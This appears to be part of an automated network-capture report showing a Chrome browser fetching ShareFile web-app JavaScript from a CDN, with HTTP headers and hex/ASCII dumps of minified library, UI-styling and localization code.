                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC16384INData Raw: 36 37 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 3d 74 7c 7c 6e 65 77 20 46 6f 72 6d 44 61 74 61 3b 76 61 72 20 72 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 65 3f 22 22 3a 6e 2e 69 73 44 61 74 65 28 65 29 3f 65 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 3a 6e 2e 69 73 41 72 72 61 79 42 75 66 66 65 72 28 65 29 7c 7c 6e 2e 69 73 54 79 70 65 64 41 72 72 61 79 28 65 29 3f 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 42 6c 6f 62 3f 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 29 3a 42 75 66 66 65 72 2e 66 72 6f 6d 28 65 29 3a 65 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 61 29 7b 69 66 28 6e 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 29 7c 7c
                                                                                                                                                                                                                                                                                Data Ascii: 67);e.exports=function(e,t){t=t||new FormData;var r=[];function o(e){return null===e?"":n.isDate(e)?e.toISOString():n.isArrayBuffer(e)||n.isTypedArray(e)?"function"==typeof Blob?new Blob([e]):Buffer.from(e):e}return function i(e,a){if(n.isPlainObject(e)||
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC12823INData Raw: 3d 22 31 2e 31 39 2e 31 31 22 3b 76 61 72 20 61 3d 69 2e 70 72 6f 74 6f 74 79 70 65 2c 73 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 28 5b 2e 2a 2b 3f 5e 3d 21 3a 24 7b 7d 28 29 7c 5b 5c 5d 5c 2f 5c 5c 5d 29 2f 67 2c 22 5c 5c 24 31 22 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 22 55 6e 64 65 66 69 6e 65 64 22 3a 53 74 72 69 6e 67 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 72 65 74 75 72 6e 22 41 72
                                                                                                                                                                                                                                                                                Data Ascii: ="1.19.11";var a=i.prototype,s=Object.prototype.hasOwnProperty;function c(e){return e.replace(/([.*+?^=!:${}()|[\]\/\\])/g,"\\$1")}function u(e){return e===undefined?"Undefined":String(Object.prototype.toString.call(e)).slice(8,-1)}function l(e){return"Ar
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 5d 20 61 6e 64 20 50 75 6e 79 63 6f 64 65 2e 6a 73 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 27 29 3b 69 66 28 65 2e 74 6f 41 53 43 49 49 28 74 29 2e 6d 61 74 63 68 28 69 2e 69 6e 76 61 6c 69 64 5f 68 6f 73 74 6e 61 6d 65 5f 63 68 61 72 61 63 74 65 72 73 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 48 6f 73 74 6e 61 6d 65 20 22 27 2b 74 2b 27 22 20 63 6f 6e 74 61 69 6e 73 20 63 68 61 72 61 63 74 65 72 73 20 6f 74 68 65 72 20 74 68 61 6e 20 5b 41 2d 5a 30 2d 39 2e 2d 3a 5f 5d 27 29 7d 7d 2c 69 2e 65 6e 73 75 72 65 56 61 6c 69 64 50 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 29 7b 76 61 72 20 74 3d 4e 75 6d 62 65 72 28 65 29 3b 69 66 28 21 28 2f 5e 5b 30 2d 39 5d 2b 24 2f 2e 74 65 73 74 28 74 29 26 26 74 3e
                                                                                                                                                                                                                                                                                Data Ascii: ] and Punycode.js is not available');if(e.toASCII(t).match(i.invalid_hostname_characters))throw new TypeError('Hostname "'+t+'" contains characters other than [A-Z0-9.-:_]')}},i.ensureValidPort=function(e){if(e){var t=Number(e);if(!(/^[0-9]+$/.test(t)&&t>
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC2804INData Raw: 6e 67 28 6e 2e 6c 65 6e 67 74 68 29 7c 7c 22 2e 2f 22 2c 73 2e 62 75 69 6c 64 28 29 7d 2c 61 2e 65 71 75 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 2c 6e 2c 6f 2c 61 2c 63 3d 74 68 69 73 2e 63 6c 6f 6e 65 28 29 2c 75 3d 6e 65 77 20 69 28 65 29 2c 66 3d 7b 7d 3b 69 66 28 63 2e 6e 6f 72 6d 61 6c 69 7a 65 28 29 2c 75 2e 6e 6f 72 6d 61 6c 69 7a 65 28 29 2c 63 2e 74 6f 53 74 72 69 6e 67 28 29 3d 3d 3d 75 2e 74 6f 53 74 72 69 6e 67 28 29 29 72 65 74 75 72 6e 21 30 3b 69 66 28 6e 3d 63 2e 71 75 65 72 79 28 29 2c 6f 3d 75 2e 71 75 65 72 79 28 29 2c 63 2e 71 75 65 72 79 28 22 22 29 2c 75 2e 71 75 65 72 79 28 22 22 29 2c 63 2e 74 6f 53 74 72 69 6e 67 28 29 21 3d 3d 75 2e 74 6f 53 74 72 69 6e 67 28 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28
                                                                                                                                                                                                                                                                                Data Ascii: ng(n.length)||"./",s.build()},a.equals=function(e){var t,r,n,o,a,c=this.clone(),u=new i(e),f={};if(c.normalize(),u.normalize(),c.toString()===u.toString())return!0;if(n=c.query(),o=u.query(),c.query(""),u.query(""),c.toString()!==u.toString())return!1;if(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 29 2c 79 3d 3d 74 29 7b 66 6f 72 28 64 3d 72 2c 6d 3d 63 3b 21 28 64 3c 28 76 3d 6d 3c 3d 69 3f 75 3a 6d 3e 3d 69 2b 6c 3f 6c 3a 6d 2d 69 29 29 3b 6d 2b 3d 63 29 5f 3d 64 2d 76 2c 43 3d 63 2d 76 2c 41 2e 70 75 73 68 28 53 28 6a 28 76 2b 5f 25 43 2c 30 29 29 29 2c 64 3d 77 28 5f 2f 43 29 3b 41 2e 70 75 73 68 28 53 28 6a 28 64 2c 30 29 29 29 2c 69 3d 45 28 72 2c 78 2c 6e 3d 3d 6f 29 2c 72 3d 30 2c 2b 2b 6e 7d 2b 2b 72 2c 2b 2b 74 7d 72 65 74 75 72 6e 20 41 2e 6a 6f 69 6e 28 22 22 29 7d 61 3d 7b 76 65 72 73 69 6f 6e 3a 22 31 2e 33 2e 32 22 2c 75 63 73 32 3a 7b 64 65 63 6f 64 65 3a 4f 2c 65 6e 63 6f 64 65 3a 41 7d 2c 64 65 63 6f 64 65 3a 52 2c 65 6e 63 6f 64 65 3a 54 2c 74 6f 41 53 43 49 49 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 5f 28 65
                                                                                                                                                                                                                                                                                Data Ascii: ),y==t){for(d=r,m=c;!(d<(v=m<=i?u:m>=i+l?l:m-i));m+=c)_=d-v,C=c-v,A.push(S(j(v+_%C,0))),d=w(_/C);A.push(S(j(d,0))),i=E(r,x,n==o),r=0,++n}++r,++t}return A.join("")}a={version:"1.3.2",ucs2:{decode:O,encode:A},decode:R,encode:T,toASCII:function(e){return _(e
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 3f 72 2b 3d 63 65 28 6f 2c 74 29 3a 72 2b 3d 6f 7d 29 29 2c 74 26 26 28 72 3d 78 28 72 29 29 2c 73 65 2e 73 65 74 28 65 2c 72 29 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 75 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 78 28 22 22 2e 63 6f 6e 63 61 74 28 74 2c 22 5f 22 29 2e 63 6f 6e 63 61 74 28 63 65 28 65 2c 21 30 29 29 29 7d 22 72 61 6e 64 6f 6d 2d 22 2e 63 6f 6e 63 61 74 28 44 61 74 65 2e 6e 6f 77 28 29 2c 22 2d 22 29 2e 63 6f 6e 63 61 74 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2e 2f 67 2c 22 22 29 3b 75 6e 64 65 66 69 6e 65 64 3b 75 6e 64 65 66 69 6e 65 64 3b 76 61 72 20 6c 65 3d 53 28 29 3b 66 75 6e 63 74 69 6f 6e 20 66 65 28 65 29 7b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 3f 22 22 2e
                                                                                                                                                                                                                                                                                Data Ascii: ?r+=ce(o,t):r+=o})),t&&(r=x(r)),se.set(e,r)),r}function ue(e,t){return x("".concat(t,"_").concat(ce(e,!0)))}"random-".concat(Date.now(),"-").concat(Math.random()).replace(/\./g,"");undefined;undefined;var le=S();function fe(e){return"number"==typeof e?"".
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC13580INData Raw: 6d 69 6c 79 3a 6e 2c 66 6f 6e 74 53 69 7a 65 3a 6f 7d 3d 65 2c 69 3d 60 5b 63 6c 61 73 73 5e 3d 22 24 7b 74 7d 22 5d 2c 20 5b 63 6c 61 73 73 2a 3d 22 20 24 7b 74 7d 22 5d 60 3b 72 65 74 75 72 6e 7b 5b 72 3f 60 2e 24 7b 72 7d 60 3a 69 5d 3a 7b 66 6f 6e 74 46 61 6d 69 6c 79 3a 6e 2c 66 6f 6e 74 53 69 7a 65 3a 6f 2c 62 6f 78 53 69 7a 69 6e 67 3a 22 62 6f 72 64 65 72 2d 62 6f 78 22 2c 22 26 3a 3a 62 65 66 6f 72 65 2c 20 26 3a 3a 61 66 74 65 72 22 3a 7b 62 6f 78 53 69 7a 69 6e 67 3a 22 62 6f 72 64 65 72 2d 62 6f 78 22 7d 2c 5b 69 5d 3a 7b 62 6f 78 53 69 7a 69 6e 67 3a 22 62 6f 72 64 65 72 2d 62 6f 78 22 2c 22 26 3a 3a 62 65 66 6f 72 65 2c 20 26 3a 3a 61 66 74 65 72 22 3a 7b 62 6f 78 53 69 7a 69 6e 67 3a 22 62 6f 72 64 65 72 2d 62 6f 78 22 7d 7d 7d 7d 7d 2c 71
                                                                                                                                                                                                                                                                                Data Ascii: mily:n,fontSize:o}=e,i=`[class^="${t}"], [class*=" ${t}"]`;return{[r?`.${r}`:i]:{fontFamily:n,fontSize:o,boxSizing:"border-box","&::before, &::after":{boxSizing:"border-box"},[i]:{boxSizing:"border-box","&::before, &::after":{boxSizing:"border-box"}}}}},q


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                118192.168.2.64984513.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:20 UTC598OUTGET /sharefile-web/sharefiledev-projects-pilet/2.0.29/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 309782
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Thu, 03 Oct 2024 14:22:41 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 08:41:35 GMT
                                                                                                                                                                                                                                                                                ETag: "a5c6f208fe49a7152e57b0225d1e43c4"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 3aed5a4f89d72775aaf2cc5a5f642386.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 0nPbBb7dcC8FDJN6EHtE4la3QlfLrr88ZnVhfO4z1RYgj7Ll16XAgQ==
                                                                                                                                                                                                                                                                                Age: 33826
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 70 72 6f 6a 65 63 74 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 69 3d 7b 7d 2c 63 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65 74 75 72
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevprojectspilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},c={},s={},u={};retur
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 34 32 29 2c 6f 3d 2f 5e 28 28 63 68 69 6c 64 72 65 6e 7c 64 61 6e 67 65 72 6f 75 73 6c 79 53 65 74 49 6e 6e 65 72 48 54 4d 4c 7c 6b 65 79 7c 72 65 66 7c 61 75 74 6f 46 6f 63 75 73 7c 64 65 66 61 75 6c 74 56 61 6c 75 65 7c 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 7c 69 6e 6e 65 72 48 54 4d 4c 7c 73 75 70 70 72 65 73 73 43 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 57 61 72 6e 69 6e 67 7c 73 75 70 70 72 65 73 73 48 79 64 72 61 74 69 6f 6e 57 61 72 6e 69 6e 67 7c 76 61 6c 75 65 4c 69 6e 6b 7c 61 62 62 72 7c 61 63 63 65 70 74 7c 61 63 63 65 70 74 43 68 61 72 73 65 74 7c 61 63 63 65 73 73 4b 65 79 7c 61 63 74 69 6f 6e 7c 61 6c 6c 6f 77 7c 61 6c 6c 6f 77 55 73 65 72 4d 65 64 69 61 7c 61 6c 6c 6f 77 50 61 79 6d 65 6e 74 52 65 71 75 65 73 74 7c 61 6c 6c 6f 77 46
                                                                                                                                                                                                                                                                                Data Ascii: 42),o=/^((children|dangerouslySetInnerHTML|key|ref|autoFocus|defaultValue|defaultChecked|innerHTML|suppressContentEditableWarning|suppressHydrationWarning|valueLink|abbr|accept|acceptCharset|accessKey|action|allow|allowUserMedia|allowPaymentRequest|allowF
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 2d 77 69 64 74 68 3a 20 34 70 78 3b 5c 6e 5c 74 62 6f 72 64 65 72 2d 6c 65 66 74 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 5c 6e 5c 74 62 6f 78 2d 73 68 61 64 6f 77 3a 20 22 2c 22 3b 5c 6e 5c 74 22 2c 22 20 7b 5c 6e 5c 74 5c 74 62 6f 72 64 65 72 3a 20 75 6e 73 65 74 3b 5c 6e 5c 74 7d 5c 6e 22 5d 29 29 2c 66 2e 61 53 2e 62 6f 78 53 68 61 64 6f 77 2c 64 2e 76 41 29 2c 76 3d 28 30 2c 73 2e 5a 29 28 6d 29 28 61 7c 7c 28 61 3d 28 30 2c 63 2e 5a 29 28 5b 22 5c 6e 5c 74 70 61 64 64 69 6e 67 3a 20 38 70 78 20 22 2c 22 20 22 2c 22 3b 5c 6e 5c 74 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 5c 6e 5c 74 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 5c 6e 5c 74 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 20 30 3b 5c
                                                                                                                                                                                                                                                                                Data Ascii: -width: 4px;\n\tborder-left-style: solid;\n\tbox-shadow: ",";\n\t"," {\n\t\tborder: unset;\n\t}\n"])),f.aS.boxShadow,d.vA),v=(0,s.Z)(m)(a||(a=(0,c.Z)(["\n\tpadding: 8px "," ",";\n\tborder-style: solid;\n\tborder-width: 1px;\n\tborder-top-right-radius: 0;\
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC15232INData Raw: 72 3a 73 2e 69 4e 2c 69 6e 66 6f 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 5f 43 2c 6d 6f 64 61 6c 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 6f 72 2c 62 6c 61 64 65 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 6f 72 2c 66 6c 79 6f 76 65 72 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 65 43 2c 6c 69 73 74 49 74 65 6d 48 6f 76 65 72 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 5a 50 2c 6c 69 73 74 49 74 65 6d 53 65 6c 65 63 74 65 64 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 76 56 2c 70 72 69 6d 61 72 79 54 65 78 74 3a 73 2e 54 69 2c 73 65 63 6f 6e 64 61 72 79 54 65 78 74 3a 73 2e 6d 4b 2c 6d 65 74 61 64 61 74 61 54 65 78 74 3a 73 2e 6d 4b 2c 62 6f 72 64 65 72 3a 73 2e 6d 4b 2c 70 72 69 6d 61 72 79 41 70 70 42 61 63 6b 67 72 6f 75 6e 64 3a 73 2e 68 65 2c 70 72 69 6d 61 72 79 43 6f 6e
                                                                                                                                                                                                                                                                                Data Ascii: r:s.iN,infoBackground:s._C,modalBackground:s.or,bladeBackground:s.or,flyoverBackground:s.eC,listItemHoverBackground:s.ZP,listItemSelectedBackground:s.vV,primaryText:s.Ti,secondaryText:s.mK,metadataText:s.mK,border:s.mK,primaryAppBackground:s.he,primaryCon
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 73 79 6d 62 6f 6c 22 2c 41 70 70 72 6f 76 61 6c 73 46 69 6c 65 49 63 6f 6e 3a 22 47 65 6e 65 68 6d 69 67 75 6e 67 73 64 61 74 65 69 22 2c 41 75 64 69 6f 49 63 6f 6e 3a 22 41 75 64 69 6f 64 61 74 65 69 22 2c 43 6f 64 65 46 69 6c 65 49 63 6f 6e 3a 22 43 6f 64 65 64 61 74 65 69 22 2c 43 77 46 6f 72 6d 49 63 6f 6e 3a 22 46 6f 72 6d 75 6c 61 72 76 6f 72 6c 61 67 65 22 2c 43 77 54 65 6d 70 6c 61 74 65 49 63 6f 6e 3a 22 57 6f 72 6b 66 6c 6f 77 76 6f 72 6c 61 67 65 22 2c 43 77 57 6f 72 6b 66 6c 6f 77 49 63 6f 6e 3a 22 57 6f 72 6b 66 6c 6f 77 69 6e 73 74 61 6e 7a 22 2c 44 63 6d 49 63 6f 6e 3a 22 44 43 4d 2d 44 61 74 65 69 22 2c 44 77 67 49 63 6f 6e 3a 22 44 57 47 2d 44 61 74 65 69 22 2c 45 6d 61 69 6c 49 63 6f 6e 3a 22 45 2d 4d 61 69 6c 2d 44 61 74 65 69 22 2c 45
                                                                                                                                                                                                                                                                                Data Ascii: symbol",ApprovalsFileIcon:"Genehmigungsdatei",AudioIcon:"Audiodatei",CodeFileIcon:"Codedatei",CwFormIcon:"Formularvorlage",CwTemplateIcon:"Workflowvorlage",CwWorkflowIcon:"Workflowinstanz",DcmIcon:"DCM-Datei",DwgIcon:"DWG-Datei",EmailIcon:"E-Mail-Datei",E
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 61 6c 75 65 7d 7d 2e 22 2c 65 6e 74 65 72 5f 76 61 6c 69 64 5f 64 69 67 69 74 3a 22 56 65 75 69 6c 6c 65 7a 20 65 6e 74 72 65 72 20 75 6e 20 63 68 69 66 66 72 65 22 2c 65 78 63 65 65 64 5f 6d 61 78 5f 63 68 61 72 73 3a 22 4c 65 20 6d 65 73 73 61 67 65 20 61 20 61 74 74 65 69 6e 74 20 6c 61 20 6c 69 6d 69 74 65 20 64 65 20 63 61 72 61 63 74 c3 a8 72 65 73 2e 20 49 6c 20 65 73 74 20 70 6f 73 73 69 62 6c 65 20 71 75 27 69 6c 20 73 6f 69 74 20 74 72 6f 6e 71 75 c3 a9 22 2c 66 6f 72 6d 61 74 74 65 64 4e 75 6d 62 65 72 46 69 65 6c 64 3a 7b 63 61 6e 6e 6f 74 42 65 42 65 74 77 65 65 6e 45 72 72 6f 72 3a 22 4c 65 20 6e 6f 6d 62 72 65 20 6e 65 20 70 65 75 74 20 70 61 73 20 c3 aa 74 72 65 20 63 6f 6d 70 72 69 73 20 65 6e 74 72 65 20 7b 7b 6d 69 6e 7d 7d 20 65 74 20
                                                                                                                                                                                                                                                                                Data Ascii: alue}}.",enter_valid_digit:"Veuillez entrer un chiffre",exceed_max_chars:"Le message a atteint la limite de caractres. Il est possible qu'il soit tronqu",formattedNumberField:{cannotBeBetweenError:"Le nombre ne peut pas tre compris entre {{min}} et
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 69 6c 49 63 6f 6e 3a 22 41 72 71 75 69 76 6f 20 64 65 20 65 6d 61 69 6c 22 2c 45 6d 70 74 79 34 30 34 49 63 6f 6e 3a 22 49 6c 75 73 74 72 61 c3 a7 c3 a3 6f 20 64 65 20 61 72 71 75 69 76 6f 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 22 2c 45 6d 70 74 79 41 70 70 73 49 63 6f 6e 3a 22 49 6c 75 73 74 72 61 c3 a7 c3 a3 6f 20 64 65 20 61 70 6c 69 63 61 74 69 76 6f 22 2c 45 6d 70 74 79 43 6f 6d 6d 65 6e 74 73 49 63 6f 6e 3a 22 49 6c 75 73 74 72 61 c3 a7 c3 b5 65 73 20 64 65 20 63 6f 6d 65 6e 74 c3 a1 72 69 6f 22 2c 45 6d 70 74 79 43 6f 6d 70 6c 65 74 65 49 63 6f 6e 3a 22 49 6c 75 73 74 72 61 c3 a7 c3 a3 6f 20 64 65 20 74 6f 64 6f 73 20 6f 73 20 69 74 65 6e 73 20 63 6f 6e 63 6c 75 c3 ad 64 6f 73 22 2c 45 6d 70 74 79 43 6f 6d 70 75 74 65 72 49 63 6f 6e 3a 22
                                                                                                                                                                                                                                                                                Data Ascii: ilIcon:"Arquivo de email",Empty404Icon:"Ilustrao de arquivo no encontrado",EmptyAppsIcon:"Ilustrao de aplicativo",EmptyCommentsIcon:"Ilustraes de comentrio",EmptyCompleteIcon:"Ilustrao de todos os itens concludos",EmptyComputerIcon:"
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC16384INData Raw: 65 64 26 63 6f 6e 74 61 69 6e 65 72 52 49 44 3d 22 2e 63 6f 6e 63 61 74 28 65 29 2c 7b 6d 65 74 68 6f 64 3a 22 47 45 54 22 7d 29 2c 74 2e 6e 65 78 74 3d 33 2c 68 28 6e 2c 7b 65 78 70 65 63 74 65 64 53 74 61 74 75 73 3a 32 30 30 2c 64 65 66 61 75 6c 74 45 72 72 6f 72 4d 65 73 73 61 67 65 3a 22 55 6e 61 62 6c 65 20 74 6f 20 67 65 74 20 64 65 6c 65 74 65 64 20 70 72 6f 6a 65 63 74 73 22 7d 29 3b 63 61 73 65 20 33 3a 72 65 74 75 72 6e 20 72 3d 74 2e 73 65 6e 74 2c 74 2e 6e 65 78 74 3d 36 2c 72 2e 74 65 78 74 28 29 3b 63 61 73 65 20 36 3a 72 65 74 75 72 6e 20 6f 3d 74 2e 73 65 6e 74 2c 74 2e 61 62 72 75 70 74 28 22 72 65 74 75 72 6e 22 2c 4a 53 4f 4e 2e 70 61 72 73 65 28 6f 2c 6d 29 29 3b 63 61 73 65 20 38 3a 63 61 73 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                Data Ascii: ed&containerRID=".concat(e),{method:"GET"}),t.next=3,h(n,{expectedStatus:200,defaultErrorMessage:"Unable to get deleted projects"});case 3:return r=t.sent,t.next=6,r.text();case 6:return o=t.sent,t.abrupt("return",JSON.parse(o,m));case 8:case"end":return
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC12792INData Raw: 74 75 72 6e 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 69 28 65 2c 74 29 3b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 3b 22 4f 62 6a 65 63 74 22 3d 3d 3d 6e 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 28 6e 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 3b 69 66 28 22 4d 61 70 22 3d 3d 3d 6e 7c 7c 22 53 65 74 22 3d 3d 3d 6e 29 72 65 74 75 72 6e 20 41 72 72 61 79 2e 66 72 6f 6d 28 65 29 3b 69 66 28 22 41 72 67 75 6d 65 6e 74 73 22 3d 3d 3d 6e 7c 7c 2f 5e 28 3f 3a 55 69 7c 49 29 6e 74 28 3f 3a 38 7c 31 36 7c 33 32 29 28 3f 3a 43 6c 61 6d 70 65 64 29 3f 41 72 72 61 79 24 2f 2e 74 65
                                                                                                                                                                                                                                                                                Data Ascii: turn;if("string"==typeof e)return i(e,t);var n=Object.prototype.toString.call(e).slice(8,-1);"Object"===n&&e.constructor&&(n=e.constructor.name);if("Map"===n||"Set"===n)return Array.from(e);if("Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.te
                                                                                                                                                                                                                                                                                2024-10-09 18:05:21 UTC12792INData Raw: 36 30 34 43 31 31 33 2e 30 30 36 20 39 35 2e 36 39 37 35 20 31 31 32 2e 39 37 33 20 39 34 2e 37 31 39 32 20 31 31 33 2e 30 36 37 20 39 33 2e 37 34 38 36 5a 4d 31 34 33 2e 31 36 39 20 39 36 2e 36 36 32 37 48 31 33 37 2e 33 37 33 43 31 33 37 2e 34 31 34 20 39 35 2e 37 38 31 36 20 31 33 37 2e 32 32 20 39 35 2e 30 34 35 34 20 31 33 36 2e 37 39 33 20 39 34 2e 35 31 36 32 43 31 33 36 2e 35 34 33 20 39 34 2e 32 30 36 39 20 31 33 36 2e 31 39 37 20 39 33 2e 39 34 33 20 31 33 35 2e 37 33 33 20 39 33 2e 37 30 39 33 43 31 33 34 2e 37 37 20 39 33 2e 32 32 34 34 20 31 33 33 2e 37 37 33 20 39 33 2e 31 32 31 33 20 31 33 32 2e 39 35 36 20 39 33 2e 34 30 36 38 43 31 33 32 2e 38 36 39 20 39 33 2e 33 32 39 37 20 31 33 32 2e 37 37 37 20 39 33 2e 32 35 37 39 20 31 33 32 2e 36
